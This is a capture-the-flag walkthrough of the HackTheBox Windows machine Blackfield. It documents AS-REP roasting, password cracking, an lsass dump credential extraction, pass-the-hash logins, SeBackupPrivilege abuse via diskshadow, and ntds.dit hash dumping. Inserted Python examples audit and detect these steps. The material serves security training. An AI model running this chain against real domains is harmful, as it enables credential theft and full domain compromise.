Blackfield is one of the machines currently available on the HackTheBox hacking platform, and its difficulty is rated Hard.
It is a machine based on the Windows operating system.
Port scanning
As usual, we add the IP of the Blackfield machine, 10.10.10.192, to /etc/hosts as blackfield.htb and start with an nmap port scan.
```
# Nmap 7.80 scan initiated Sat Jun 6 22:29:11 2020 as: nmap -sC -sV -Pn -p- -oA nmap/blackfield 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 65527 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-07 03:32:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/6%Time=5EDBFD0E%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h01m30s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-07T03:34:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 6 22:34:03 2020 -- 1 IP address (1 host up) scanned in 291.32 seconds
```
We find several interesting ports, so we move on to enumerating them.
Enumeration
Among other things, we enumerate the SMB service, aiming to get information about the existing shares:
```
$ smbclient -L \\\\10.10.10.192\\
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
We obtain a list of users from the profiles$ share, so we build a user list from it.
We also enumerate LDAP to try to get more information about the domain:
```
$ ldapsearch -H ldap://10.10.10.192 -x -s base '' "(objectClass=*)" "*"
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: (objectClass=*) *
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=BLACKFIELD,DC=local
ldapServiceName: BLACKFIELD.local:dc01$@BLACKFIELD.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=lo
 cal
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=BLACKFIELD,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=BLACKFIELD,DC=local
namingContexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingContexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingContexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
isSynchronized: TRUE
highestCommittedUSN: 167151
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=BLACKFIELD,DC=local
dnsHostName: DC01.BLACKFIELD.local
defaultNamingContext: DC=BLACKFIELD,DC=local
currentTime: 20200607033847.0Z
configurationNamingContext: CN=Configuration,DC=BLACKFIELD,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```
Having discovered the domain, and with the user list we generated, we use impacket's GetNPUsers tool to try to obtain a hash:
```
$ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 10.10.10.192 BLACKFIELD.LOCAL/ | grep -v SessionError
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:0d0fd51854362b6e93600a1e7c82c695$b51bb67f84d4cd0f0bbef68ab127fdcee47f81bdf55a246f9bd8a88bd77de392920c162cb3b2269d559887dcc13693ebbb8f09661064ed1785914da89708a9b47607d0bb1eb9cbe1e1c9c5e77472d1763280dbe77d13cd11d90e4a76e40959230dc92a801e1ac312169fa362cbb173fbce9e0e577594ab9d30276a2242e291ee325c340a53082edf3551cd2b6a161475b1b502d79b8641df209e514e78765fa386ebb7ac21337b11bebc11cfc0702a4f84ebff610a10d0bc62e1772e8a91d00617b428a9341a028e9765dfbcf316b73a9f4bdff5c78ae4794cfdb8286aef2fb9621a5087568d5cf2f41449ae94d05f925697ad0c
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
```
We obtain the hash of the support user. We will use John the Ripper to try to crack its password:
```
$ john support.hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:31 DONE (2020-06-07 11:24) 0.03146g/s 451069p/s 451069c/s 451069C/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
And we get the password:
```
$ john --show support.hash
$krb5asrep$23$support@BLACKFIELD.LOCAL:#00^BlackKnight
1 password hash cracked, 0 left
```
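The GetNPUsers result above depends on the UF_DONT_REQUIRE_PREAUTH bit of userAccountControl. As an added example (not part of the original writeup), the following audits an LDIF export for enabled accounts with that bit set, handling the folded lines seen in the ldapsearch output. The sample LDIF, its userAccountControl values, the old_svc account and the function names are constructed for illustration.

```python
import base64

UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # Kerberos pre-authentication not required

# Constructed sample, not data from the box. A line starting with one space
# continues the previous line (LDIF folding, as in the ldapsearch output).
SAMPLE_LDIF = "\n".join([
    "dn: CN=support,CN=Users,DC=BLACKFIELD,DC=lo",
    " cal",
    "sAMAccountName: sup",
    " port",
    "userAccountControl: 4260352",   # NORMAL | DONT_EXPIRE | DONT_REQ_PREAUTH
    "",
    "dn: CN=audit2020,CN=Users,DC=BLACKFIELD,DC=local",
    "sAMAccountName: audit2020",
    "userAccountControl: 66048",     # NORMAL | DONT_EXPIRE
    "",
    "dn: CN=old_svc,CN=Users,DC=BLACKFIELD,DC=local",
    "sAMAccountName:: b2xkX3N2Yw==", # base64 value, hypothetical account
    "userAccountControl: 4194818",   # DONT_REQ_PREAUTH but disabled
])


def parse_entries(ldif_text):
    """Return a list of {attribute: [values]} dicts, one per LDIF entry."""
    lines = []
    for raw in ldif_text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]            # unfold a continuation line
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:               # trailing "" flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#") or ":" not in line:
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):           # "attr:: <base64>"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value.strip())
    return entries


def roastable_accounts(ldif_text):
    """Names of enabled accounts that answer AS-REQ without pre-authentication."""
    hits = []
    for entry in parse_entries(ldif_text):
        name = entry.get("sAMAccountName", [None])[0]
        uac = entry.get("userAccountControl", [None])[0]
        if name is None or uac is None:
            continue
        flags = int(uac)
        if flags & UF_DONT_REQUIRE_PREAUTH and not flags & UF_ACCOUNTDISABLE:
            hits.append(name)
    return hits
```

Any account this reports should have pre-authentication re-enabled, or at least a long random password, since its AS-REP can be requested without credentials.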
With the credentials obtained, we try to gather more information about the domain and its users. We will use bloodhound-python for this:
```
$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d BLACKFIELD.local -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
```
With the information gathered, we discover that the support user can reset the password of the audit2020 user, so we do exactly that over an RPC connection:
```
$ rpcclient -U support //10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $>
rpcclient $> setuserinfo2 audit2020 23 'Asdf123.'
rpcclient $>
```
Once the password is reset, we verify access with CrackMapExec and see that we can reach SMB with this user:
```
$ cme smb 10.10.10.192 -u audit2020 -p 'Asdf123.'
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Asdf123.
```
So we use smbmap to check where this user has access:
```
smbmap -u audit2020 -p 'Asdf123.' -H 10.10.10.192
[+] IP: 10.10.10.192:445        Name: blackfield.htb
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        C$                      NO ACCESS       Default share
        forensic                READ ONLY       Forensic / Audit share.
        IPC$                    READ ONLY       Remote IPC
        NETLOGON                READ ONLY       Logon server share
        profiles$               READ ONLY
        SYSVOL                  READ ONLY       Logon server share
```
We see that we now have access to the forensic share, which we did not have before. We download the files in it and see that they are several Windows crash dump files, among which we find a very interesting one, lsass.zip:
```
$ ls -1
conhost.zip
ctfmon.zip
dfsrs.zip
dllhost.zip
ismserv.zip
lsass.zip
mmc.zip
RuntimeBroker.zip
ServerManager.zip
sihost.zip
smartscreen.zip
svchost.zip
taskhostw.zip
winlogon.zip
wlms.zip
WmiPrvSE.zip
```
We extract the contents of the zip file and try to obtain credentials from it with the pypykatz tool:
```
$ pypykatz lsa minidump lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
        == SSP [633ba]==
                username
                domainname
                password None
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
                Password: None
        == WDIGEST [633ba]==
                username svc_backup
```
Here we only show a small part of the output, but we can see that it returns the hash of the svc_backup user, which we will use later to log in to the system.
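The root cause of this step is a process dump of lsass left in a share that a low-privileged account can read. As an added example (not part of the original writeup), this scans zip archives from a share for Windows minidumps by their "MDMP" signature rather than by file name, and marks those whose name points at lsass. The share contents below are constructed in memory and the function names are hypothetical.

```python
import io
import zipfile

MINIDUMP_MAGIC = b"MDMP"          # first four bytes of a Windows minidump
CREDENTIAL_PROCESSES = {"lsass"}  # dumps of these processes hold logon secrets


def scan_archive(name, data):
    """Return one finding per zip member that starts with the minidump magic."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                      # not a zip: nothing to report
    with archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            try:
                with archive.open(info) as member:
                    header = member.read(len(MINIDUMP_MAGIC))
            except RuntimeError:             # encrypted member, cannot inspect
                continue
            if header != MINIDUMP_MAGIC:
                continue
            stem = info.filename.rsplit("/", 1)[-1].rsplit(".", 1)[0].lower()
            findings.append({
                "archive": name,
                "member": info.filename,
                "size": info.file_size,
                "credential_risk": stem in CREDENTIAL_PROCESSES,
            })
    return findings


def scan_share(files):
    """files maps archive name to bytes; credential-bearing dumps sort first."""
    results = []
    for name in sorted(files):
        results.extend(scan_archive(name, files[name]))
    return sorted(results, key=lambda f: not f["credential_risk"])


def _make_zip(member, payload):
    """Build a small zip in memory (used only for the constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member, payload)
    return buf.getvalue()


# Constructed sample modelled on the forensic share listing above.
SAMPLE_SHARE = {
    "lsass.zip": _make_zip("lsass.DMP", MINIDUMP_MAGIC + b"\x00" * 64),
    "svchost.zip": _make_zip("svchost.DMP", MINIDUMP_MAGIC + b"\x00" * 64),
    "notes.zip": _make_zip("readme.txt", b"constructed text file"),
}
```

A dump that has been renamed is still reported because the check is on content; only the credential_risk flag relies on the member name.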
Getting the user flag
With the hash obtained, we log in with the evil-winrm tool:
```
$ ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\svc_backup\desktop> ls


    Directory: C:\Users\svc_backup\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         6/9/2020   9:30 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\desktop>
```
And we are inside the machine, which gives us the user flag.
Privilege escalation
Once inside, we review the user's privileges:
```
*Evil-WinRM* PS C:\Users\svc_backup\desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
We find two very interesting privileges, SeBackupPrivilege and SeRestorePrivilege.
Searching on Google, we find a way to make a backup and get the files we need with the diskshadow tool.
Before we can do this, though, we need to edit the system permissions so that we can read certain files we do not have permission for; to do so we will use Windows ACLs to change the owner of the system files.
We run the following commands:
```
powershell -ep bypass
$path = "C:\"
$user = "blackfield\svc_backup"
$acl = get-acl $path
# Access rule: FullControl for $user, inherited by subfolders and files
$acl_rule = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow'
$access_rule = New-Object System.Security.AccessControl.FileSystemAccessRule $acl_rule
$acl.AddAccessRule($access_rule)
# Write the modified ACL back to $path
Set-Acl -Path $path -AclObject $acl
```
Once the permissions are set, we create our diskshadow.txt file with the following content:
```
SET CONTEXT PERSISTENT NOWRITERS
ADD VOLUME C: ALIAS someAlias
CREATE
EXPOSE %someAlias% z:
RESET
EXIT
```
And we run it to perform the backup:
```
*Evil-WinRM* PS C:\tmp> diskshadow.exe /s diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 10:47:57 AM

-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {1d155cf3-2d05-41b3-8fc0-82239bef3860} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {f45e1826-fd36-421b-961b-de6e4519294d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {f45e1826-fd36-421b-961b-de6e4519294d}

        * Shadow copy ID = {1d155cf3-2d05-41b3-8fc0-82239bef3860}               %someAlias%
                - Shadow copy set: {f45e1826-fd36-421b-961b-de6e4519294d}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/10/2020 10:47:57 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {1d155cf3-2d05-41b3-8fc0-82239bef3860}
The shadow copy was successfully exposed as z:\.
-> reset
-> exit
```
Now we only need to access the z: drive created from our copy and get the ntds.dit file:
```
*Evil-WinRM* PS z:\> copy z:\windows\ntds\ntds.dit c:\tmp
*Evil-WinRM* PS z:\> cd c:\tmp
*Evil-WinRM* PS C:\tmp> dir


    Directory: C:\tmp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/10/2020  10:47 AM            611 2020-06-10_10-47-57_DC01.cab
-a----        6/10/2020  10:47 AM            112 diskshadow.txt
-a----        6/10/2020  10:44 AM       18874368 ntds.dit


*Evil-WinRM* PS C:\tmp> download ntds.dit
Info: Downloading C:\tmp\ntds.dit to ntds.dit

Info: Download successful!

*Evil-WinRM* PS C:\tmp>
```
To obtain the hashes we also need the system file, so we save a copy of it from the Windows registry:
```
reg save hklm\system c:\tmp\system
```
And now we obtain the users' hashes with impacket's secretsdump tool:
```
$ secretsdump.py -ntds ntds.dit -system system LOCAL
```
And we get the keys of all the users.
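The procedure above leaves a recognisable sequence on the domain controller: diskshadow run in script mode, a copy of ntds.dit, and a save of the SYSTEM hive. As an added example (not part of the original writeup), this correlates those stages per host and user within a time window. The events are constructed records standing in for normalized process-creation or PowerShell logging; the field names, the backup_job account and all timestamps except the diskshadow one are assumptions.

```python
import re
from datetime import datetime, timedelta

# One pattern per stage of the procedure described on this page.
STAGES = {
    "shadow_copy_script": re.compile(r"\bdiskshadow(\.exe)?\s+.*/s\b", re.I),
    "system_hive_save": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\system\b", re.I),
    "ntds_copy": re.compile(r"\\ntds\\ntds\.dit\b", re.I),
}

# Constructed events; "cmd" is the logged command line or script text.
SAMPLE_EVENTS = [
    {"time": "2020-06-10T02:00:00", "host": "DC01",
     "user": r"BLACKFIELD\backup_job",
     "cmd": r"reg save hklm\system d:\backup\system.hiv"},
    {"time": "2020-06-10T10:45:12", "host": "DC01",
     "user": r"BLACKFIELD\svc_backup", "cmd": "whoami /all"},
    {"time": "2020-06-10T10:47:57", "host": "DC01",
     "user": r"BLACKFIELD\svc_backup",
     "cmd": "diskshadow.exe /s diskshadow.txt"},
    {"time": "2020-06-10T10:49:10", "host": "DC01",
     "user": r"BLACKFIELD\svc_backup",
     "cmd": r"copy z:\windows\ntds\ntds.dit c:\tmp"},
    {"time": "2020-06-10T10:51:30", "host": "DC01",
     "user": r"BLACKFIELD\svc_backup",
     "cmd": r"reg save hklm\system c:\tmp\system"},
]


def correlate(events, window=timedelta(minutes=15), min_stages=2):
    """Alert when one user hits min_stages distinct stages on a host in window."""
    recent = {}   # (host, user) -> [(timestamp, stage), ...] inside the window
    alerts = {}   # (host, user) -> latest alert for that pair
    for ev in sorted(events, key=lambda e: e["time"]):
        stage = next((n for n, rx in STAGES.items() if rx.search(ev["cmd"])), None)
        if stage is None:
            continue
        ts = datetime.fromisoformat(ev["time"])
        key = (ev["host"], ev["user"])
        kept = [(t, s) for t, s in recent.get(key, []) if ts - t <= window]
        kept.append((ts, stage))
        recent[key] = kept
        stages = sorted({s for _, s in kept})
        if len(stages) >= min_stages:
            alerts[key] = {
                "host": ev["host"],
                "user": ev["user"],
                "stages": stages,
                "first_seen": kept[0][0].isoformat(),
            }
    return list(alerts.values())
```

The scheduled hive backup by backup_job matches a single stage and stays below the threshold, which is why the rule correlates stages instead of alerting on each command.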
Getting the root flag
With the hashes obtained, all that remains is to log in to the system as admin:
```
$ ruby evil-winrm.rb -u Administrator -H XXXXXXXXXXXXXXXXXXXXXXXX -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-ar---        6/10/2020  11:04 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop>
```
And now we have our root flag to complete this machine and collect our points.
If you are a HackTheBox user and you liked my writeup, please give me respect at the following link: https://www.hackthebox.eu/home/users/profile/103792